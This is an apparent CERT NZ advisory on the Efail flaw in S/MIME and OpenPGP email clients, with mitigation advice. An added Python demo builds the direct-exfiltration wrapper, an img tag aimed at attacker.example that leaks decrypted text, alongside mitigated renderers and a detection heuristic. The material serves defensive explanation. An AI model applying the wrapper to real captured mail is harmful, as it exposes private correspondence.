7:30am, 15 May 2018
S/MIME and OpenPGP email client vulnerability
UPDATED: 10.20am, minor wording clarification. We originally referred to S/MIME and OpenPGP protocol vulnerabilities. The update clarifies the vulnerability also affects mail clients and the way they handle and display S/MIME and OpenPGP encrypted messages.
CERT NZ is aware of a new vulnerability in email clients and their use of OpenPGP and S/MIME, which are two major standards for providing end-to-end encryption for emails.
The attack works on any encrypted email an attacker has already collected, including messages that were sent a long time ago.
CERT NZ is not aware of any active attacks. However, we strongly recommend you:
- block all backchannels used in your email client, such as the loading of remote content (images, CSS, certificate lookups) when a message is displayed
- stay up to date with patches for your email client and encryption plugins. Clients can fix the way they handle and display encrypted message parts independently; closing the underlying weakness in the S/MIME and OpenPGP formats (ciphertext that can be altered without detection) will also require updates to those standards, after which clients may release further patches.
What's happening
Systems affected
Email clients that display emails encrypted with S/MIME or OpenPGP standards.
Exploiting this vulnerability requires the email client to allow backchannels, such as loading remote HTML content (for example, images), CSS, or X.509 certificate requests.
All messages that have been sent using S/MIME or OpenPGP may be at risk. The attack relies on the attacker already holding a copy of the encrypted email, and there is no way to confirm whether a given email has been collected, or by whom.
What this means
The plaintext content of encrypted emails can be leaked by email clients.
How the vulnerability could be exploited:
- The attacker collects encrypted emails. These can be obtained in several ways, such as through a man-in-the-middle attack on the connection or by gaining access to the mail (SMTP) server that stores them.
- The attacker manipulates the email, using specific techniques to inject attacker-controlled content around or into the encrypted message and to remove or bypass its integrity checks. The injected content contains an exfiltration channel (for example, an HTML image or hyperlink pointing at an attacker-controlled server) that will carry the decrypted plaintext to the attacker.
- The altered email is then sent to the original sender or receiver. The encrypted payload itself is unchanged, so it still decrypts with their key. The attacker may disguise the manipulated message, for example by setting new From, Date, and Subject headers, so that it appears unsuspicious.
- If the email is decrypted and displayed in an affected mail client, and the client follows the backchannel (for example, loads the remote image), the plaintext is sent to the attacker's server.
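The steps above, and the "block all backchannels" advice in the Prevention section, as an added Python illustration. This is not code from the CERT NZ advisory or from the Efail researchers; the captured ciphertext, the secret plaintext, the attacker host attacker.example, the toy lookup-table "decryption" and all function names are constructed for the demo. The wrapper structure (an HTML fragment that opens an image tag, the untouched ciphertext, then a fragment that closes it) is the direct-exfiltration layout documented at Efail.de; the three renderers simulate an affected client, a client that renders each MIME part in isolation, and a client with no backchannels at all, and a final heuristic shows how a mail filter could flag such a wrapper without being able to decrypt it.

```python
"""Added illustration of the EFAIL direct-exfiltration wrapper and of
client-side mitigations. Not part of the advisory; all data constructed."""
import email
import re
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

# Constructed stand-ins. A real attacker reuses the victim's real ciphertext
# unchanged and never needs the key; the dict only lets this demo "decrypt".
CAPTURED_CIPHERTEXT = (b"-----BEGIN PGP MESSAGE-----\n"
                       b"ConstructedCiphertextBlob==\n"
                       b"-----END PGP MESSAGE-----\n")
SECRET_PLAINTEXT = "Wire transfer PIN is 4711"
_TOY_KEYRING = {CAPTURED_CIPHERTEXT: SECRET_PLAINTEXT}
# The demo marks encrypted parts by this type; real mail uses
# multipart/encrypted (OpenPGP) or application/pkcs7-mime (S/MIME).
ENCRYPTED_TYPE = "application/octet-stream"


def toy_decrypt(ciphertext: bytes) -> str:
    """Placeholder for the victim client's S/MIME or OpenPGP decryption."""
    return _TOY_KEYRING[ciphertext]


def build_wrapper(ciphertext: bytes, html_before: str, html_after: str) -> bytes:
    """Attacker side: place untouched ciphertext between two HTML fragments.
    Headers are forged so the message looks like ordinary correspondence."""
    msg = MIMEMultipart("mixed")
    msg["From"] = "colleague@example.org"
    msg["To"] = "victim@example.org"
    msg["Subject"] = "Re: invoice"
    msg.attach(MIMEText(html_before, "html"))
    msg.attach(MIMEApplication(ciphertext))      # ciphertext, unchanged
    if html_after:
        msg.attach(MIMEText(html_after, "html"))
    return msg.as_bytes()


def build_efail_wrapper(ciphertext: bytes, attacker_url: str) -> bytes:
    """Open an <img> URL before the ciphertext and close it after it, so a
    client that concatenates decrypted parts puts the plaintext in the URL."""
    return build_wrapper(ciphertext, f'<img src="{attacker_url}?leak=', '">')


def _parts(raw: bytes):
    """Yield (content_type, text) for every leaf part, decrypting as we go."""
    for part in email.message_from_bytes(raw).walk():
        if part.is_multipart():
            continue
        payload = part.get_payload(decode=True)
        if part.get_content_type() == ENCRYPTED_TYPE:
            yield "text/plain", toy_decrypt(payload)   # the client decrypts
        else:
            yield part.get_content_type(), payload.decode()


def remote_urls(html: str) -> list:
    """Remote resources a rendering client would fetch (the backchannel)."""
    return re.findall(r'src="([^"]*)"', html)


def vulnerable_render(raw: bytes) -> list:
    """Affected client: joins all parts into one HTML document and loads
    remote content, so the decrypted text leaves inside the image URL."""
    return remote_urls("".join(text for _, text in _parts(raw)))


def isolated_render(raw: bytes) -> list:
    """Each MIME part rendered as its own document. Defeats this wrapper (the
    <img> tag is never completed) but not variants that inject the tag into
    the decrypted plaintext itself by manipulating the ciphertext."""
    return [u for _, text in _parts(raw) for u in remote_urls(text)]


def hardened_render(raw: bytes) -> tuple:
    """The advisory's recommendation: no backchannels. Returns (text shown to
    the user as plain text, resources fetched); the latter is always empty."""
    return "\n".join(text for _, text in _parts(raw)), []


def looks_like_efail_wrapper(raw: bytes) -> bool:
    """Heuristic for a mail filter that cannot decrypt: an HTML part ending
    in an unterminated tag directly before an encrypted part."""
    leaves = [p for p in email.message_from_bytes(raw).walk() if not p.is_multipart()]
    for i, part in enumerate(leaves[:-1]):
        if part.get_content_type() != "text/html":
            continue
        html = part.get_payload(decode=True).decode(errors="replace")
        unterminated = re.search(r"<[^>]*\Z", html) is not None
        if unterminated and leaves[i + 1].get_content_type() == ENCRYPTED_TYPE:
            return True
    return False


if __name__ == "__main__":
    raw = build_efail_wrapper(CAPTURED_CIPHERTEXT, "http://attacker.example/collect")
    print("vulnerable client fetches :", vulnerable_render(raw))
    print("isolated rendering fetches:", isolated_render(raw))
    print("hardened client fetches   :", hardened_render(raw)[1])
    print("wrapper flagged by filter :", looks_like_efail_wrapper(raw))
```

Running the script shows the affected client fetching a URL that contains the secret plaintext, while both mitigated renderers fetch nothing. Note that isolation alone is not sufficient in general, which is why the advisory recommends blocking every outbound request; the heuristic is only a tripwire for the crude wrapper form and should not be relied on as the fix.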
What to look for
How to tell if you're at risk
If you receive S/MIME or OpenPGP encrypted emails, and your mail client allows backchannels such as HTML remote resources, you are at risk of having these emails compromised.
What to do
Prevention
CERT NZ is not aware of any active attacks. However, we strongly recommend you:
- block all backchannels used in your email client and display emails in plaintext only. Backchannels are any outbound requests made to fetch or render content in the email message. Research has shown that HTML remote content, CSS, JavaScript, and PKI (X.509 certificate) requests can all be used as backchannels. We recommend blocking all of them, as research is still developing.
- stay informed of your email client's patch notifications. Fixes to the way clients handle and display encrypted message parts do not depend on the standards, so apply them as they are released. The OpenPGP and S/MIME standards themselves have not yet been updated to fix the underlying weakness; once they are, email clients may release further patches to close this vulnerability.
More information
Read the details about this vulnerability at Efail.de
If you require more information or further support, submit a report on our website or contact us on 0800 CERTNZ.
For media enquiries, email our media desk at certmedia@cert.govt.nz